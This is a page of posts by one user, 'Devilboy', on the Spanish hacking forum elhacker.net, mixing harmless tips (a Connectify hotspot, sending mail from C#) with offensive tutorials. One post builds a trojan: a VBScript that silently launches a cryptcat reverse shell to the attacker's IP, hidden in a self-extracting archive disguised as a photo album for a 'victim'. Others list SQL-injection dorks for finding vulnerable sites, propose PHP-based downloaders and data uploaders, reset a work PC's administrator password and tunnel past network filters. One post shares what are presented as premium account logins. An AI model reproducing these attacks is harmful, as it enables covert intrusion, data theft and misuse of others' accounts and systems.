elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Temas
Páginas: 1 [2] 3
11  Comunicaciones / Redes / Conectify Tu PC como HotSpot en: 1 Febrero 2011, 00:11 am
Usa tu PC con windows 7 como Hotspot.





Un ejemplo:

Devilboy tiene una pc con modem 3G y sus amigos no tienen internet.

Devilboy instala el programa y crea un hotspot

Sus amigos tienen internet ;D

Otro ejemplo:

Devilboy tiene en su trabajo una PC con internet

Devilboy no puede conectar su iphone a la red xq tiene un filtrado mac.

El Devil instala el programa en su PC.

Devil conecta su iphone al hotspot y consigue internet ;D

Pagina Oficial:

http://www.connectify.me/
12  Seguridad Informática / Hacking / Tunel SSh Usado como Proxy en: 20 Enero 2011, 23:08 pm
Esenario:

Trabajo o escuela con varias paginas bloqueadas (megaupload, youtube, facebook, etc).

Requisitos:

Una cuenta shell gratis.
Para esto podémos usar dos opciones
1) Un servidor ssh creado en nuestra pc (en otro tuto ya expliqué como lograr esto).

http://foro.elhacker.net/tutoriales_documentacion/crear_tunel_ssh_en_windows-t314865.0.html

2) Un servidor ssh conectado a la nube (opción recomendada)

Bueno yo recomiendo la dos ya que de la primera forma habría que dejar nuestra pc encendida y con la opción 2 pues solo nos conectamos a un servidor.

Tambien necesitámos un cliente ssh

usarémos Putty
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

Muestra:

Sin Proxy



Verificamos nuestra ip publica:

www.whatismyip.com




Bien ahora vamos a acceder a nuestro servidor ssh desde putty


 
1) En la pestaña sessions pondrémos la url de nuestro servidor y el puerto por defecto es 22, a menos que les den otro o que ustedes configuren cualquier otro.

2) Damos click en la pestaña SSH-tunnels.
escribimos el puerto, puede ser el que gusten en mi caso usaré el 5151
seleccionamos Dinamic y para finalizar add



4) Podémos guardar la configuracion para no hacer lo mismo para ves querámos crear el tunel.

5)

Nos logeamos con nuestro user y pass




6)Configurar los navegadores

Firefox:

Click en la pestaña Herramientas-Opciones

Avanzado-red-configuracion



y dejamos esta pantalla justo como muestra la imagen

-configuracion manual de proxy
   -servidor SOCKS: 127.0.0.1 Puerto: 5151 (o el que hayan usado)



Muestra
Con Proxy:



Verificamos de nuevo nuestra ip:

www.whatismyip



Espero les guste

Este metodo se puede usar para bypassear websense u otros filtros de seguridad en las redes

salu2

Devilboy

13  Programación / .NET (C#, VB.NET, ASP) / Mandar Correo con c# y smtp de gmail en: 9 Enero 2011, 22:21 pm
primero se incluye este namespace

Código
  1. using System.Net.Mail;

y dentro de un boton por ejemplo se escribe esto:

Código
  1.            MailMessage correo = new MailMessage();
  2.            correo.From = new MailAddress("Tu_correo");
  3.            correo.To.Add("E-mail_destinatario");
  4.            correo.Subject = "Prueba";
  5.            correo.Body = "prueba de correo";
  6.  
  7.            SmtpClient cliente = new SmtpClient("smtp.gmail.com");
  8.            cliente.Port = 587;
  9.            cliente.Credentials = new System.Net.NetworkCredential("Tu_correo_gmail", "Tu_password");
  10.            cliente.EnableSsl = true;
  11.            cliente.Send(correo);


adema puede kedar mucho mas lindo si usamos un formulario windows y cambiamos los datos por campos de texto


ademas si se agrega esto:

Código
  1. correo.IsBodyHtml = true;

en el cuerpo del mensaje podemos agregar html


y para finalizar con estas lineas podemos adjuntar un archivo:

Código:
            Attachment adjuntos = new Attachment("ruta_de_nuestro_archivo/carta.txt");
            correo.Attachments.Add(adjuntos);

espero les guste
14  Foros Generales / Foro Libre / Cuentas Premium Hotfile en: 27 Diciembre 2010, 15:10 pm
Disfrutenlas

login : alhawsani
pass : alkumi11

login : wackus
pass : bootie

15  Informática / Tutoriales - Documentación / Crear Tunel SSH en Windows en: 25 Diciembre 2010, 05:47 am
Bueno un tuto que acabo de hacer para crear un servidor SSH en Windows y poder acceder a nuesrtro ordenador de forma remota mediante la linea de comandos.

Tal ves se preguntarán ¿y para que me sirve eso si existen programas como VNC u otros donde puedo hacerlo de forma grafica?
Bueno la diferencia es que SSH es un protocolo con alta seguridad, asi que no se deben de preocupar por atakes como MIM man in the middle.

Espero que les guste y si es así el proximo será sobre Linux

http://ns2.elhacker.net/Como_crear_un_t__nel_entre_dos_PC.pdf

Que lo disfruten

Devilboy
16  Seguridad Informática / Nivel Web / SQL Injection de forma amigable en: 20 Diciembre 2010, 02:19 am
Bueno ya tenia tiempo que no hacia un videotuto, pero espero que les guste y no lo usen para defacear ya que estoy totalmente en contra del deface.

Bueno eso ya depende de uds xD

aki les dejo el video

http://uploadmirrors.com/download/KQSKNAIU/sqli2.avi.zip

tambien les dejo el programa Havij

http://www.itsecteam.com/en/projects/project1_page2.htm

http://www.megaupload.com/?d=9OTMOJP2

y aki les dejo los dorks que pueden usar para encontrar webs vulnerables a sqli

Código:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
17  Seguridad Informática / Hacking / Subir y Bajar archivo de la Victima en: 20 Diciembre 2010, 01:53 am
Aki un video tuto que hice.

una vez teniendo shell podemos subir y bajarnos archivos

espero les guste

http://rapidshare.com/files/55768206/subir_y_bajar.zip.html

saludos

Devilboy
18  Seguridad Informática / Hacking / Obtener shell con Cryptcat o Netcat en: 20 Diciembre 2010, 01:51 am
weno, les enseñaré como obtener shell con netcat o cryptcat y de este modo poder troyanisar la pc victima, a la que podamos subir y bajar archivos hasta abrir la lectora del cd aparte de muchas cosas mas ^^.

pero eso ya es cosa de la imaginación de cada uno

En lo personal prefiero Cryptcat ya que es exactamente lo mismo que netcat solo que mas seguro

para este metodo necesitamos lo siguiente:
1.-Cryptcat
2.-Winrar
3.-Nircmd
4.- Alguna foto, juego o alguna otra cosa para no levnatar sospecha
5.- Un pekeño script en visual basic y batch

Bien, manos a la obra
ponemos todos los archivos en una carpeta y renombramos los archivos, algo que no sea comun por ejemplo run32dll, igfxdll, inetcpe, etc

en este caso kedará asi:
Código:
cryptcat = run32dll
nircmd=igfxdll
script=inetcpe
foto = imon32



seguimos, en esta ocacion ocuparemos una shell volteada, esto kiere decir que ocuparemos los puertos 21 (ftp) y 25 (smtp) para que el firewall no nos moleste

el script que vamos a hacer es para que no aparezca la ventana de ms-dos al ejecutar la shell volteada en la pc victima.

el script es el siguiente:

Código:
set cmd = createobject("wscript.shell")
Set shell = CreateObject("Scripting.FileSystemObject")
dta=" @echo off"&vbcrlf& _
"%c:\windows\system32%"&vbcrlf& _
"run32dll.exe NUESTRA-IP 21 |cmd.exe| run32dll.exe NUESTRA-IP 25"""
set b=shell.CreateTextFile("w.bat")
b.close
set d=shell.OpenTextFile("w.bat",2)
d.write dta
d.close
cmd.run "w.bat", vbHide

copiamos ese code en un block de notas, asegurense de cambiar donde dice "NUESTRA-IP" por su ip, recuerden que para hacer eso nos vamos a inicio-ejecutar-cmd y ahi ponemos ipconfig y nos dará nuestra ip
guardamos es script con el nombre de inetcpe.vbs

bien ya tenemos todo lo necesario, ahora solo nos keda juntarlo con el winrar de la sig manera:

seleccionamos los 4 archivos, click derecho y add to archive, o agregar al archivo



seleccionamos lo sig:
metodo de compresion: la mejor
crear archivo sfx

y borrar archivos despues de archivarlos



despues de esto, nos vamos a la pestaña "avanzado" y damos click en optiones sfx



donde dice: path to extract o localizacion de la extracción ponemos lo siguiente:
c:\widows\system32
esto es para que los archivos se extraigan dentro de la carpeta system32
y donde dice Run after extraction o ejecutar tras la estracción pones cualkier cosa



despues de esto, nos vamos a la pestaña modos y seleccionamos hide all o esconder todo y skip existing files o sobreescribir archivos



damos aceptar y nos vamos a la pestaña comentarios

nos saldrá una pantalla parecida a esta




vamos a modificar los comentarios de la sig forma:



damos aceptar y listo ya tenemos nuestro troyano creado

cambiamos el nombre a nuestro archivo por ejemplo en mi caso "album de fotos"



bien, ese archivo es el que le debemos de mandar a la victima
pero para eso antes nosotros debemos abrirl el cryptcat y poner lo siguiente:

abrimos el cryptcat y ponemos -vvlp 21
abrimos otra consola y ponemos lo siguiente -vvlp 25



una vez que le mandemos el archivo a la victima obtendremos shell

ejecuté el archivo en mi pc parta que vean y keda asi:

solo vemos la foto pero al mismo tiempo tenemos shell



una vez que tengamos shell, escribimos los comandos en la ventana donde pusimos esto -vvlp21 y en la otra ventana veran el resultado de la consulta.

ahora se preguntaran para que es el nircmd que pusimos al principio y al cual le pusimos el nombre de: igfxdll
bueno es para poder manejar un poco la pc de la victima, como por ejemplo
en la shell ponemos este comando:
igfxdll.exe open cdrom d:
y se la abrirá el cdrom a la victima ^^

weno con este programa se pueden hacer muchas maldades mas pero eso les toca a uds

espero les haya gustado el tuto


aki estan las herramientas

http://rapidshare.com/files/87150425/TUTO.rar.html

saludos

Devilboy
19  Seguridad Informática / Hacking / Hackeando con PHP en: 20 Diciembre 2010, 01:50 am
Bueno en este tuto les enseñaré solo lo básico de esta tecnica.

Si kieren poder usar todo su poder deben saber php y usar su imaginación.

El truco consiste solamente en escribir un codigo php y convertirlo en .exe

para esto necesitamos una herramienta llamada bamcompile: http://www.bambalam.se/bamcompile/

Nos descargámos el archivo y lo extraemos en algúna carpeta ya que este programa funciona desde la linea de comandos.


Inicio-ejecutar-cmd

Código:
cd C:\Documents and Settings\Devilboy\Escritorio\bam

y para usarlo el comando es este:

Código:
bamcompile.exe archivo.php archivo.exe

nos mostrará algo como esto:

Código:
Bambalam PHP EXE Compiler/Embedder

Mainfile: archivo.php
Outfile: archivo.exe

Encoding and embedding archivo.php

archivo.exe created successfully!

Ahora un ejemplo, creamos el archivo.php con este code:

Código:
<?php

    $control = fopen("miarchivo.txt","w+"); 
    if($control == false){ 
      die("No se ha podido crear el archivo."); 
   } 

fwrite($control,"ssssssssssssssssssssssssssssss");

?>

y repetimos el comando:

Código:
bamcompile.exe archivo.php archivo.exe

y ejecutámos el archivo.exe, despues de unos segundo se nos crea el archivo.txt.

pero, ¿xq se ve la pantalla de ms-dos al ejecutar el .exe?

Bueno solo agreguémos -w al crear el archivo:

Código:
bamcompile.exe -w archivo.php archivo.exe

Ahora ejecutamos de nuevo y vemos que la pantalla ya no aparece xD

Bueno esto solo ha sido una introducción ya que se puede usar para muchas cosas lindas, les voy a dar unas ideas.

-Para pharming, con un code muy simple se puede cambiar el archivo host
-Para hacer un downloader, osea subir nuestro server en un host ftp y con php hacer que se descargue y se ejecute
-para hacer un uploader, a diferencia del anterios es que este subiria a nuestro host ftp la info que kisieramos de la makina victima
etc, pero eso ya depende de uds

Espero les haya gustado este intro

salu2

Devilboy
20  Seguridad Informática / Hacking / Crackear Administrador de windows usando Linux en: 20 Diciembre 2010, 01:43 am
Bueno esto es por si la pc de tu trabajo esta blokeada y no te deja instalar nada sino tienes permisos de admin  ;D.

Booteamos Linux Mint, ubuntu o bt4

accedemos a la consola y tecleamos lo sig.

Código:
sudo apt-get install chntpw

ahora montamos el disco duro de windows desde carpetas una vez montada accedemos a la consola y navegamos hacia la carpeta config de windows:

Código:
cd /mtn/hda1/Windows/System32/config

Listamos los usuarios:

Código:
chntpwd -l SAM

Kitamos el pass o ponemos otro

Código:
chntpwd -u Administrador

y presionamos el 1 para borrar el pass o 2 para cambiarlo.

reiniciamos y nos logeamos en winbugs usando el usuario: Administrador pero sin contraseña.

Nota: Tambien funciona en windows 7

Devilboy
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines